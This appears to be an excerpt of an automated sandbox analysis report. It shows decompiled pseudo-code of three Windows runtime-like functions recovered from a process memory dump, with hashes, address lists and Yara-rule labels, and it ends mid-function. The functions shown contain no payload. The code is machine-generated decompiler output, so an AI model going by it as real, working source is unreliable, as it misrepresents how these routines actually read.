0x0466db74
0x0466dc9f
0x0466dca2
0x0466dcb0
0x0466dcb0
0x0466dad1
0x046bb4e5
0x046bb4c8
0x00000000
0x00000000
0x00000000
0x0466d831
0x0466d80d
0x00000000
0x0466d800
0x046bb47f
0x046bb485
0x00000000
0x046bb485
0x0466d665
0x0466d652
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba5e10594107b59c269b2537efbf92bfdf56a21aa4a75c55f4149d2a287f178
Instruction ID: a8a5d92fbf608464580650318ddb6cc05a7a832bd89a7ba71aaad9c3b5ee6ab6
Opcode Fuzzy Hash: 3ba5e10594107b59c269b2537efbf92bfdf56a21aa4a75c55f4149d2a287f178
Instruction Fuzzy Hash: 40E1DE74B00359CFEB248F24C984BA9B7B1BF85708F0541A9D94A9B790F774BD81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0466849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0466849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x472f9c0);
				E046AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4747b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0466CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04672280( *[fs:0x30], 0x4748550);
						_t139 =  *0x4747b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0468F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0466FFB0(_t193, _t235, 0x4748550);
								L5:
								return E046AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04651C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4747b9c; // 0x0
							_t235 = L04674620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4747b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0468A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0466FFB0(_t193, _t235, 0x4748550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L046777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L046777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4747b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4747b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E046937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4747b9c; // 0x0
									_t214 = L04674620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E046937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4747b10 =  *0x4747b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4747b04 =  *0x4747b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L046777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L046777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4747b08 =  *0x4747b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E046957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0469F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L046777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0468A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L046777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E046996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0466849b
0x0466849b
0x0466849b
0x0466849b
0x0466849d
0x046684a2
0x046684a7
0x046684b1
0x046684d8
0x00000000
0x046684b3
0x046684c4
0x046684c9
0x046684cd
0x046684cf
0x046684cf
0x046684d6
0x046684e6
0x046684e9
0x046684ec
0x046684ef
0x046684f2
0x046684f4
0x046684fc
0x04668501
0x04668506
0x04668509
0x046686e0
0x046686e5
0x046686e8
0x046686ed
0x046686f0
0x046686f2
0x046b9afd
0x046b9b02
0x046684da
0x046684df
0x046684df
0x046686fa
0x046686fd
0x046686fe
0x04668701
0x04668706
0x04668709
0x0466870b
0x00000000
0x00000000
0x04668711
0x04668725
0x04668727
0x0466872a
0x0466872c
0x046b9af0
0x046b9af5
0x04668732
0x04668732
0x04668732
0x04668735
0x04668737
0x04668515
0x04668515
0x04668518
0x0466851d
0x04668523
0x04668527
0x0466852b
0x04668537
0x04668539
0x0466853c
0x0466853e
0x0466868c
0x04668691
0x04668699
0x0466869b
0x04668744
0x04668748
0x046686a1
0x046686a1
0x046686a1
0x046686a4
0x046686a8
0x046b9bdf
0x046b9bdf
0x046686ae
0x046686b0
0x00000000
0x046686b6
0x00000000
0x046b9be9
0x046686b0
0x04668544
0x0466854a
0x0466854d
0x04668551
0x0466876e
0x04668778
0x0466877b
0x04668780
0x04668557
0x04668557
0x0466855d
0x0466855d
0x0466856b
0x0466856e
0x04668570
0x04668573
0x04668576
0x04668576
0x04668579
0x0466857b
0x00000000
0x00000000
0x04668581
0x046685a0
0x046685a2
0x046685a5
0x046685a7
0x046b9b1b
0x046b9b1b
0x0466862e
0x0466862e
0x04668631
0x04668631
0x04668634
0x04668636
0x04668669
0x04668669
0x0466866b
0x046b9bbf
0x046b9bc4
0x046b9bc8
0x046b9bce
0x046b9bce
0x04668671
0x04668671
0x04668674
0x04668676
0x046b9bae
0x046b9bae
0x04668676
0x0466867c
0x0466867e
0x04668688
0x04668688
0x00000000
0x0466867e
0x04668638
0x04668638
0x0466863b
0x0466863e
0x0466863f
0x04668642
0x04668645
0x04668648
0x0466864d
0x046b9b69
0x046b9b6e
0x046b9b7b
0x046b9b81
0x046b9b85
0x046b9b89
0x046b9ba7
0x046b9b8b
0x046b9b91
0x046b9b9a
0x046b9b9f
0x046b9b9f
0x04668788
0x0466878d
0x04668763
0x04668763
0x04668766
0x00000000
0x04668766
0x046b9b70
0x00000000
0x046b9b70
0x04668656
0x0466865a
0x0466865c
0x04668752
0x04668756
0x00000000
0x00000000
0x0466875e
0x00000000
0x0466875e
0x04668662
0x04668662
0x04668662
0x04668666
0x00000000
0x04668666
0x046685b7
0x046685b9
0x046685bc
0x046685bf
0x046685cc
0x046685d1
0x046685d4
0x046685db
0x046685de
0x046685e0
0x046b9b5f
0x00000000
0x046b9b5f
0x046685e6
0x046685ea
0x046686c3
0x046686c5
0x046686c8
0x046686ca
0x046b9b16
0x00000000
0x046b9b16
0x046686d6
0x046685f6
0x046685f6
0x046685f9
0x04668602
0x04668606
0x0466860a
0x0466860b
0x0466860e
0x04668611
0x00000000
0x04668611
0x046685f3
0x00000000
0x046685f3
0x04668619
0x0466861e
0x0466861e
0x04668621
0x04668622
0x04668623
0x04668625
0x0466862c
0x00000000
0x0466873d
0x00000000
0x0466873d
0x04668737
0x0466850f
0x04668512
0x00000000
0x04668512
0x00000000
0x046684d6

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a80e1f9089f24a72f8bdb5a60f532e0e849b3b681ec0ca0abb600c4f8efdee6
Instruction ID: 28ad985bd21509ea317285aee321348cb8feac2d1f813713c311598d62d13269
Opcode Fuzzy Hash: 2a80e1f9089f24a72f8bdb5a60f532e0e849b3b681ec0ca0abb600c4f8efdee6
Instruction Fuzzy Hash: 64B129B4F01249DFDB14EFA9C984AADBBB5BF48304F10452AE506AB341E770BD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0468513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0468513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x474d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0469D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04672280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04674620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0469F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0466FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x474b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0469B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04685142
0x0468514c
0x04685150
0x04685157
0x04685159
0x0468515e
0x04685165
0x04685169
0x0468516c
0x04685172
0x04685176
0x0468517a
0x0468517a
0x0468517a
0x0468517f
0x046c6d8b
0x046c6d8e
0x046c6d91
0x046c6d95
0x046c6d98
0x046c6d9c
0x046c6da0
0x046c6da3
0x046c6da7
0x046c6e26
0x046c6e26
0x046c6e2a
0x046851f9
0x046851f9
0x046851fe
0x046c6e33
0x046c6e33
0x046c6e39
0x046c6e3d
0x046c6e46
0x046c6e50
0x00000000
0x00000000
0x046c6e52
0x046c6e53
0x046c6e56
0x046c6e5d
0x00000000
0x00000000
0x00000000
0x046c6e5f
0x046c6e67
0x046c6e77
0x046c6e7f
0x046c6e80
0x046c6e88
0x046c6e90
0x046c6e9f
0x046c6ea5
0x046c6ea9
0x046c6eb1
0x046c6ebf
0x00000000
0x00000000
0x046c6ecf
0x046c6ed3
0x00000000
0x00000000
0x046c6edb
0x046c6ede
0x046c6ee1
0x046c6ee8
0x046c6eeb
0x046c6eed
0x046c6ef0
0x046c6ef4
0x046c6ef8
0x046c6efc
0x00000000
0x00000000
0x046c6f0d
0x046c6f11
0x046c6f32
0x046c6f37
0x046c6f3b
0x046c6f3e
0x046c6f41
0x046c6f46
0x00000000
0x00000000
0x046c6f4c
0x046c6f50
0x046c6f50
0x046c6f54
0x046c6f62
0x046c6f65
0x046c6f6d
0x046c6f7b
0x046c6f7b
0x046c6f93
0x046c6f98
0x046c6fa0
0x046c6fa6
0x046c6fb3
0x046c6fb6
0x046c6fbf
0x046c6fc1
0x046c6fd5
0x046c6fda
0x046c6fda
0x046c6fdd
0x046c6fe2
0x046c6fe7
0x046c6feb
0x046c6fef
0x046c6ff3
0x0468520c
0x0468520c
0x0468520f
0x04685215
0x04685234
0x0468523a
0x0468523a
0x04685244
0x04685245
0x04685246
0x04685251
0x04685251
0x046c6f13
0x046c6f17
0x046c6f17
0x046c6f18
0x046c6f1b
0x046c6f1f
0x046c6f23
0x00000000
0x046c6f28
0x04685204
0x04685204
0x04685208
0x00000000
0x04685208
0x04685185
0x04685188
0x0468518a
0x0468518e
0x04685195
0x046c6db1
0x046c6db5
0x046c6db9
0x0468519b
0x0468519b
0x0468519e
0x046851a7
0x046851a9
0x046851a9
0x046851b5
0x046851b8
0x046851bb
0x046851be
0x046851c1
0x046851c5
0x046851c9
0x046851cd
0x046851cd
0x046851d8
0x046851dc
0x046851e0
0x046c6dcc
0x046c6dd0
0x046c6dd5
0x046c6ddd
0x046c6de1
0x046c6de1
0x046c6de5
0x046c6deb
0x046c6df1
0x046c6df7
0x046c6dfd
0x046c6e01
0x046c6e05
0x046c6e09
0x046c6e0d
0x046c6e11
0x046c6e11
0x046851eb
0x046c6e1a
0x046c6e1f
0x046c6e21
0x046c6e23
0x00000000
0x046851f1
0x046851f1
0x00000000
0x046851f1

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded8e51fffff4ff9c34a2e77d30a6f8aa7aa23f64e436f753c9ff5d479bf8f9d
Instruction ID: 0d01fff9d2c1dbc46baad827a9e320a42b226575f5cc6725a23580181fe246c8
Opcode Fuzzy Hash: ded8e51fffff4ff9c34a2e77d30a6f8aa7aa23f64e436f753c9ff5d479bf8f9d
Instruction Fuzzy Hash: 8EC112756083809FD354CF28C590A6AFBE1FF88308F144A6EF9998B352E771E945CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0465C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0465C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x474d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04666D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0469B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4747b9c; // 0x0
					_t74 = L04674620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04699650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L046777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0469F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
